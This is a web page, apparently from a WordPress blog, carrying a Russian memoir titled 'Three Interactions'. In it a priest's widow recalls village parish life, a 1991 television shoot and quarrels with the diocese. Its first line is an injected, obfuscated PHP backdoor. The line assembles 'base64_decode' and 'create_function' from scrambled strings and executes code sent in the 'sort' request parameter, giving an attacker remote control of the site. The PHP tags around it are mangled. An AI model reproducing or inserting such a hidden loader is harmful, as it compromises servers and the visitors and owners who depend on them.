nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ТРИ ИНТЕРАКЦИИ


                         эп..э…эп-пи…г…г…гра-а-ф-ффф… ф… …

     ИНТЕРАКЦИЯ -…Тезаурус  паттернов  невербального  воздействия  субъекта  отражает  социокультурную, статусно-ролевую  принадлежности,индивидно-личностные  особенности. Функции  невербальных ИНТЕРАКЦИЙ: адаптация, идентификация, стратификация, регуляция,презентация  отношений  к  себе  и  партнёру. Культурная, этническая, социальная, возрастная, гендерная  и  профессиональная  принадлежность  определяют  содержание  и  специфику  половозрастного  и  статусно-ролевого невербального  взаимодействия.
(проще:)
   ИНТЕРАКЦИЯ –  о б щ е н и е    между    л ю д ь м и.

(…  а  ну-ка   ещё  красивой  заумности:)
   ИНТЕРАКЦИЯ – динамическое  взаимодействие  и  соотношение между  двумя  и  более  переменными,
когда  величина  одной  переменной  влияет  на  величину  других  переменных.

                                                                                                                I.

            В  конце  восьмидесятых, когда  мы  въехали  и  стали  вживаться  в  Теребени  и  окрестности ( это особые истории,  на потом …), на  нас  первые   г о д  ы    никто,  кроме пьяниц  и  гуляк, внимания  не  обращал: ну  вот  снова  побудут,  побудут  и слиняют. А вереница  пьяниц  и  простаков  ходила  к  нам   с   т р е б о в а н и е м   выдать   спиртного на поддержание духа, а также  пирогов и пряников  на  закуску,  так  как  один  из  сменившихся  здесь  попов,  быв несколько  феминизированного  толка, он  и  убедил народ, что умение   стряпать  (и  удивлять вышиванием  полотенец)  это  и  есть   о к о р м л е н и е   народа. Но  я  не  про  бытовые особенности  нашей  адаптации  в деревне,  а  совсем наоборот: про единственную  профессиональную  функцию  священника  – сопровождать    д у ш у   человека  от  момента  рождения  до  момента смерти.
    В  Опочке, рай-онном  центре,  при  котором   ад-министрируется  наша  деревня ( точнее – с е л о ),  за  первые  два  наших  года в  Теребенях  там тоже  сменилось  два священника,  пока  с  1992 года наконец  не  стало  постоянного. Поэтому  в  " пересменках " в  Опочку  приглашали  служить  о.Георгия,  моего  мужа. Так  вот, известная опочецкая церковная  старушка-староста  занемогла  и всерьёз  собралась  преставляться  на  тот  свет, да  "с  чувством, с  толком, с  расстановкой ".  Могла   э т о   себе  позволить  по особой милости  Божией,  так  как  сообразно  с  Ним  провела  всю  свою  долгую  жизнь.
     Сначала  она  сама  позвонила  о.Георгию  с  просьбой  приехать  её  напутствовать, то есть  исповедать  и  причастить.  Мой  Георгий  был взволнован  –  ведь  он  только  начинал  священническую  деятельность,  и  это  был  его  первый  " смертельный  случай ".  Отец Георгий трепетный  уехал,  загадочный  приехал . . .  Через  несколько  дней  просьба  Александры  Николаевны  повторилась,  ибо  она  не  досказала  на  исповеди  забытого  греха.  Потом  очередной  вспомненный   грех   снова  затормозил  расставание  её   души  c  телом.  Мой  Георгий  всё  с  меньшим  и  меньшим  энтузиазмом  стал  выбираться  на  её  " последнее  прости ".
      Когда  же   у    р е а л ь н о   умирающей  уже  не  было  сил  самой звонить,  она  попросила  ухаживающих  за  ней  вызвать  о.Георгия . . .  Поверьте мне.  я  не ради  скалозубничания  это  описываю,  это  и  наша  общечеловеческая проблема: как  правильновысказаться ? А  этот эпизод  с предсмертной  исповедью  благочестивой  старушки  так и  остались  загадкой  и  для  меня,  и  для  о.Георгия. Останется, может быть,  загадкой  и  для  вас.  К  тому же  мы  с  мужем  в  данном  случае  и  виноваты  перед  её  памятью,  так  как  муж  мне выдал, хоть  и небольшую,  но   т а й н у   исповеди, а  я  её, тайну  исповеди, вообще  тарабаню по  всему  свету.Но, надеюсь,  Бог простит.
       Итак, в  последний  раз  муж  приехал  от  умирающей  старосты  совсем  насупленный.  Когда  пришло  известие,  что  раба  Божия  почила,  муж  не  выдержал  и  "раскололся":
 —  Знаешь,  зачем  она  меня  в  последний  раз  позвала,  вспомнив  своё  самое  последнее  недосказанное  преступление,  из-за  которого  Господь, по  её  мнению,  не  забирал  её  душу ?
       Я  молча  ждала  продолжения.
 —  Я  поехал  чтобы  только  услышать: " Батюшка !  Грешна ! Я  включала  и  выключала  свет !

                                                                                                                 I I.
        Первым   из  представивших  о.Георгия  широкой  общественности  по  телевидению  в 1990 году  был  псковский  владыка Владимир ( Котляров),  который  и  рукополагал его  в   1988 году.
      Владыка  вытребовал  именно  о.Георгия  участвовать  вместе  с  собой  в   первом   "т е л е м о с т  е",  в  котором  допустили участвовать  духовенство. "Телемост"  назывался  " Декрет  о  земле ".  В  дальнейшем ( как  нам рассказывали  близкие  к  епархиям  люди ) владыка  сокрушался,  что  как  это  он, митрополит,  не  мог  вызволить  о.Георгия  из  деревни  служить  к   себе  поближе:  хоть  в  Псков,  а  потом  –  в  Петербург.
         А  в  конце  ноября  1991 года  к  нам  из  Москвы  нагрянула  по  его  " наводке "  только  что  сформированная  телевизионная  команда  Феликса Разумовского.  Мы  были  первой  передачей  его  цикла  " Кто  мы ? Неизвестная  Россия ".  Я,  кстати –  о названии.  Помню  своё удивление  их  бурному  обсуждению этого названия, ибо  потомки  Л.Н.Толстого, оказывается, могли предъявить  наследственные права  на два  слова " кто  мы ", употреблённые  великим  писателем  в  своей  статеечке  " Благо любви. Обращение  к  людям-братьям " (1908г).
    Когда  снимали  интервью  с  о.Георгием  у  нас   дома, наш   младшенький, которому  едва  исполнилось  шесть  лет,  всё  норовил сделать  им  кузькину  мать, как  бы  случайно  пробегая  мимо  или неожиданно  кашляя. Режиссёр  был  вынужден  держать ребёнка при  себе,  отвлекая  его фокусами  на  пальцах  и  постоянно  поднося  указательный  палец  то  к  своим,  то  к  его  губам.
     Снимали  они  и  нашу  литургию. Надо  сказать, что  мы  все  двадцать  пять  лет  в  Теребенях  только  и  " соображали  на  троих " : я,  муж  и  Господь  Бог (  а если  кто  из  гостей  и  напрашивался  на " угощение  клиросом ",  то  это  были  "случайные  связи" ).
      И  вот  после,  казалось  бы,  законченных  съёмок  телепередачи  кто-то  из  телегруппы  звонит  и  говорит  несколько  странную для  уровня телепередачи  вещь, что  надо  им приехать снова  к нам, чтобы  п е р е с н я т ь  " Херувимскую"  и  выход  священника из  алтаря  с  Чашей.  Объяснили  эту  необходимость  тем,  что-де  на  "Херувимской"   ко  мне  на  клирос  влез  младшенький, стал петь  со  мной  и  этим  якобы  в с ё   испортил. Странно. . . А  я  как  раз  от  этого  эпизода  и  млела. И  вообще  уже  к  тому времени прошло  два  года,  как  сын,  утром  быв  спящим  и  запираемым  в  доме,  вдруг  сам  стал одеваться,  вылезать  в форточку  и оказываться  рядом  со  мной  на  клиросе,  поющим  литургию, здорово  попадая  по  слуху  не только  " в  ноты", но  и  в непонятные  с л о в а !
         Телевизионщики  снова  приехали,  снова  мне  эту  причину  объяснили. Может,  конечно, была   д р у г а я   причина,  а   э т а   так,  для  отмазы  –  не  знаю,  но  моё  материнское  честолюбие  было  уязвлено. Ну, думаю, вот  когда  ребёнок станет  великим певцом,  вы  ещё  об  этом  пожалеете !  А  с  о.Георгием  мы  стали  переглядываться  и  недоумевать: как  это  вне  литургии изображать  сакральную  кульминацию  церковной  службы ? Ну  раз  о.Георгий,  хоть  и  " со  скрипом ", с ними согласился,  то  и  я тоже  –  куда  деваться ?  Но  " фигу  в  кармане "  я  коварно  заложила.
        К  вечеру  они  только  и  раскачались  снимать  нужные им ( а  не  Богу )  дубли.
        А-а !  Сейчас  только  я   в с п о м н и л а:  редактор  телегруппы  всё-таки  надумала  креститься,  что  и  сделала  тогда  у  о.Георгия. Наверно,  поэтому  он  и  согласился  на  эти  дубли. Вспомнила  ещё  примечательную  ситуацию  того  вечера: оператор  телегруппы ( тогда  у  них  ещё  им  был  известный Юрий  Максимович  Назаров ) задел  телекамерой  лампаду  с  маслом  и  она  полностью  вылилась  на  него.
         Церковь  наша  18  века ,  то  есть  внутри  стиль  б а р о к к о  –  полновластный  хозяин  интерьера,  и, хочешь  не  хочешь,  это данность.  Поэтому  я  с  самого  начала  нашего служения в  ней  размышляла  о  стилистике исполнения. Изредка  я  стала " прокатывать "  как  вариант  одиночного  исполнения  " экспериментальную ",  о с о б у ю   "Херувимскую". Одиночного   исполнения – потому  что  я  и  сама  как  исполнитель  пребывала  годами  в  единственном  числе, и  при  полном  б е з л ю д ь е   на  службах. Так  вот, я  " прокатывала "  удивительную  арию  Вивальди (кстати, Вивальди  был  священником )  " Vieni, vieni ",  которая   легко легла  на  слова  "Херувимской песни" : " Иже, иже  херувимы ".
      Ну, телегруппа  не  заметила  этого  межконфессионального исполнительского нонсенса. Но  их  передачу  показывали несколько раз,  да  в  престижное  время. Никто ничего не  учуял !  А первый  раз  эту передачу показали  в  полночь  на  Рождество: по центральному  каналу  шла  самая  первая  трансляция  церковной службы  из Елоховского собора,  а  по  второму каналу (то  есть параллельно  со  службой)  шла  эта –  " наша " – первая  передача Ф.Разумовского. А телеканалов  на  тот  момент  было всего   д в а !  Как  нам  потом телевизионщики  отчитались, были  только благодарные  письма граждан, мол побольше  бы  таких передач. Слава  Богу,  что  плёнку  с  этой  передачей,  в лучших традициях тогдашнего телевидения,  смыли.
           Да  что  Вивальди !  Когда  в   2001  году  по  просьбе  спортсменов,  которые,  как  мотивировалось,  не  могут  на  своих пьедесталах  спеть  Гимна  России – " Патриотической песни "  Глинки  –  в  первую  очередь  для  них  возвратили  Советский  Гимн Михалкова – Александрова.  Я   же  " подобрала "  отправленный  в  отставку  гимн  Глинки  и  сделала   его  своей  коронной "Херувимской ".  А  когда  у  нас  в   гостях  и  на  службе  был  один  из  деканов  консерватории, специалист  по  Глинке,  я  его спросила, не  знакомое ли  ему  произведение  я  пропела  – он  не  мог  поверить  не  столько  мне,  сколько  самому  себе, что  не узнал  этой  известнейшей  мелодии  великого  композитора,  который,  как  известно, сказал,  что  музыку  создаёт н а р о д,  а  мы, мол  композиторы,  её  только  ..  это … как  его  . . .типель – тапель . . .( включаем  и  выключаем ). . .

                                                                                                  I I I .

  В  конце  мая 2005 года  мы  неожиданно  получили  из  Епархии  от  Председателя  Епархиального  суда  и  Благочинного о.П.  официальное
                                                                                     УВЕДОМЛЕНИЕ:
                                                          16. 05. 05 г. на  заседании церковного  суда
 было  рассмотрено  Ваше  интервью  газете  КП  под  названием  49 дней  и  49 ночей. Суд   констатирует  неправильное  суждение  о  церковном  посте  и  употребление  грубых  выражений, порочащих  имя  православного  священника,  что  вводит  читателя  в  недоумение. Церковный  суд  выносит  Вам  порицание.
                                                                                     благочинный о .П . . .

     Вот  так:  ни  названия  и  даты  газеты,  ни  конкретных  " в ы р а ж е н и й",  ни  автора  " интервью ".
      Я  звоню  благочинному  даже  не  ради  этих  вопросов,  а   с  тем,  что  именно  16. 05. 05 г.  мой   муж  лежал  на  операционном   столе,   в    б о л ь н и ц е   (!) в  Петербурге,  много  часов   под   ножом  высококлассных   хирургов !
        А  в  это  время, подумать  только !, собираются  где-то " революционной  тройкой ",  бывшие  "троечники",а  ныне  отцы  народа,  оперируемого  колегу   клянут-порицают , " в к л ю ч а ю т   и   в ы к л ю ч а ю т ". . .
      Я  благочинного  попросила  прислать  эту  газету ( компьютеров  ещё  в помине не  было ! )  или  хотя  бы  сделать  милость  и   сказать  её  название  ( мы  и  не  подозревали,  что  КП, указанное  в  уведомлении,  и  есть  название ), ну  хотя  бы  назвать   а в т о р а   этого " интервью ". Ответ  был  один:  уведомить ! – так  велел  владыка, точка. Но  зато  с  приветливым  звонком  не задержался о.Павел   Адельгейм, слезно попросивший  разрешить  использовать  материалы   этого  суда  для  своих   политических   целей.  Он и  прислал  нам  эту  злополучную  газету.  Муж, прочитав  статью, вспомнил  по  своим  репликам  в  ней, что  был  у  него  когда-то личного  характера  телефонный, повторяю, частный , разговор  с  известным  псковским  журналистом   Александром Донецким.
       Но странное дело: статья, собранная журналистом  из  разговоров  с   р а з н ы м и   людьми,  была  подписана  не  Донецким, а  неким  Иваном  Шмелёвым. Так  что журналист  с  псевдонимом  ( как  " консультант  с  копытом " ) оказался  неуязвим.

                В  октябре 2013 года  муж  готовился  к  очередной  хирургической  операции  в  Петербурге  и  просто  физически  не  мог   б ы т ь   на   очередном епархиальном  собрании ( за  пару сотен  километров  до  места  его  проведения,  в  отдалённом монастыре).
                Благочинный  звонит  и  сообщает,  что  митрополит  приказал  передать  о.Георгию,  чтобы  тот  из-за  неявки снял   свой священнический  наперсный  крест  и  положил  его  на  престол. Но  сказано  было  на  сей  раз   б е з   письменного "уведомления", лично  мне  по  телефону,  поэтому  я  позволила  себе  съязвить: " А  нательный  крест  не  надо  ли  тоже  снять  с себя ? "  Но  благочинный  не  дослушал  и  поэтому  не  понял   этой  моей  фразы,  а  понял  её  начало  по-своему и  начал успокаивать  меня:    — Нет,  нет, не  беспокойтесь,  не  сан  с  о.Георгия  снимают,    а     в с е г о      л и ш ь   священнический  крест  с облачения !
    Ну  ладно,  муж   спокойно  стал  служить  без   наперсного  креста. Надо  сказать,  давнишним   рефреном  его  проповедей  было то,  что  у  человека  крест  должен  быть    в н у т р и,  а   не  фарисейским  украшением. При  том  муж  злорадно  смаковал,  что подставленной,  по  приказу его   начальства,  оказываюсь  в  этой  ситуации  именно я,  поскольку  народ, съезжающийся  к  нам   в такую  даль   т о л ь к о   ради  любимого  о.Георгия,  на  литургиях  именно  ко  мне  постоянно  обращался: гляньте-ка !  батюшка крест  забыл  надеть !  подскажите  ему !  Ну,  я, невольно   прерывая  службу, начинала  описывать  ситуацию, мол  это  не случайно, что  это  епитимья  и  так  далее,  что  прибавляло  мужу  от  народа  жалости  и  популярности . . .
      Повторяю,  эта  эпопея  с  крестом  началась  с  октября. Настал  март, Великий  пост,  последний  в  жизни  о.Георгия.
      Звонит  благочинный.  Муж  рычит: " Не  бери  трубку ! "  На  третье  или  четвёртое  вызванивание  благочинного  я  – "предательница"  –  всё  же  беру  трубку, благословляюсь, как  положено, вежливо  спрашиваю  о  причине  звонка,  получаю долгие объяснения,  какие документы  по  церкви  куда  и  как  надо  отправлять.  Между  этими  повелениями  я  внутри  себя подготавливаю  вопрос о  наперсном  кресте о.Георгия. Наконец-то   настало  время  решить  эту,  повисшую  во  временнОй неизвестности, проблему ! Она  мне  надоела  постоянными  народными  домогательствами.
    Я  и  спрашиваю  благочинного:  д о к о л е  ?
    Как  раньше  говорили  " на  том  конце  провода "  произошло  крайнее  изумление:
 — Как  это ?  Ведь  было  вам  сказано  "до Рождества ",  крест  снять  и  положить  на  престол  до  Рождества !
     Сказано,  конечно,  этого   н е   б ы л о.  Но  я  политкорректно  стала  спасать   положение:  каяться  и  извиняться: ах,  какая  я  невнимательная,  пропустила  мимо  ушей  срок,  оказывается,  д о з и р о в а н н о й   епитимии !  Ах,  простите,  ради  Бога !
     Что  тут  началось !  Не  меньше  десяти  раз   мне  было  объяснено,  какая  я  нерадивая  и  бестолковая,  и  как  же   я   могла  про   т а к о е !   з а б ы т ь !  …  ах   да   какая  я . . .  А   я   извинялась,  каялась   и   извинялась.

      Не  прошло  и  полугода  после  этого –  о.Георгий  умер. Благочинный  возглавлял  величественное  отпевание.
      Прошло  ещё  почти  полгода . . .
      Сейчас  я  посмотрела  на  даты  принятых смс  в  моём  телефоне  –  искомое  сообщение, которым   я   и  завершаю  эту  меморию, прислано  благочинным  22  января  этого  (2015) года.
О.П. позвонил  мне,  вдове,  с  тем,  что  надо  послать  те-то   и  туда-то  сведения  из  церковных документов, поскольку  епархию  географически   разделили  на   две  части.
     Я   ему  послала  смс  с  отчётом  о  проделанной  работе.
     И  тут  произошло  для    м е н я   нечто  существенное.
     На  фоне  нашей  с  ним  нелюбви  друг  к  другу,  на  фоне  церковно-судебных  претензий  к  моему  мужу, о.Георгию,  по  поводу   его
                                                      н е п р а в и л ь н ы х   в ы с к а з ы в а н и й ,
на  фоне  того,  что  он, о.П.,   б л а г о – ч и н н ы й ,  на   тёмном  фоне  экрана  моего мобильного  телефона  высветилось  его священническое  поощрение  моей  исполнительности. Нет,  не  в  виде   слов   " спаси  Господи",  или   просто   " спасибо ",  или вообще     н и ч е г о,   а    в   виде   всего   лишь   двух  запанибратских   букв : Ок.
                                                                                      О кей  ! ! !  
                                                                                    ???????????
                                                                        ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
жж
                           о.ГЕОРГИЙ  в ДОМОВОЙ  ИМПЕРАТОРСКОЙ ЦЕРКВИ  ГАТЧИНСКОГО  ДВОРЦА. В  начале  девяностых  годов  митрополит ВЛАДИМИР (Котляров) благословил  о.Георгия  быть  духовником  общины. (о.Георгий  работал  перед рукоположением  в  Русском  музее  и  в  Гатчинском  дворце )
                                        +
               петр  иоанн  андрей
филипп  фома  варфоломей
               два иакова  матфей
  иуда яковль,т.е. ф а д д е й
    зилота симон   и  матфИй


Добавить комментарий